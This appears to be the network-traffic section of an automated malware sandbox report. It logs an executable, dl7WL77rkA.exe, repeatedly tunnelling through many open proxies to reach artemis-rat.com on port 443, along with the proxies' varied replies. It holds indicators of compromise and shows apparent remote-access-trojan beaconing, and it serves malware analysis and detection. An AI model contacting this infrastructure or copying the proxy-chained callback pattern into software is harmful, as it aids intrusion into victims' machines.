Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
511192.168.2.55174147.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.501707077 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
512192.168.2.55174347.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.505003929 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
513192.168.2.55146418.133.16.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.505156040 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.839391947 CET  116  IN  HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
514192.168.2.55145793.190.141.102478513876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.505207062 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.840183973 CET  226  IN  HTTP/1.1 403 Forbidden
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Length: 101
Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
515192.168.2.551373103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.511950016 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
516192.168.2.5515404.236.183.3780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.516638041 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.764094114 CET  309  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.22.0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
517192.168.2.55149945.233.170.749993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.516946077 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
518192.168.2.551347103.163.51.254803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.518888950 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.920658112 CET  343  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
519192.168.2.55145454.37.196.18980803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.531430960 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.201728106 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.202614069 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093195915 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
520192.168.2.55145543.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.538399935 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
521192.168.2.551562104.17.62.87803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.539366007 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.694029093 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
522192.168.2.551564104.25.184.189803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.539884090 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.694734097 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            523192.168.2.55151768.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.544083118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            524192.168.2.551518184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.552673101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            525192.168.2.551426110.43.34.15181183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.553085089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.191091061 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            526192.168.2.551582104.16.105.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.553419113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.707760096 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            527192.168.2.55158050.63.12.33317853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.558804989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.029817104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.561103106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701925039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905159950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            528192.168.2.551492173.212.209.49643093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.570661068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            529192.168.2.55149889.163.157.129803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.570864916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.232964039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202833891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093144894 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905376911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.701953888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.499191046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.092576981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            530192.168.2.55144342.193.58.9680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.571227074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.751040936 CET | 58 | IN | HTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            531192.168.2.551602162.159.241.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.571238041 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.743216038 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            532192.168.2.55151347.114.101.5788883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.573451996 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.879256010 CET | 334 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            533192.168.2.551584104.23.128.174803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.578043938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.743041992 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            534192.168.2.551620104.20.179.187803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.580228090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.763217926 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            535192.168.2.55151694.130.181.59327703876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.584955931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.129926920 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
536192.168.2.5514295.202.191.22580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.602507114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.389202118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.702090979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.045089960 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.902420998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.717602015 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.405213118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
537192.168.2.551533217.23.11.194471523876C:\Users\user\Desktop\dl7WL77rkA.exe
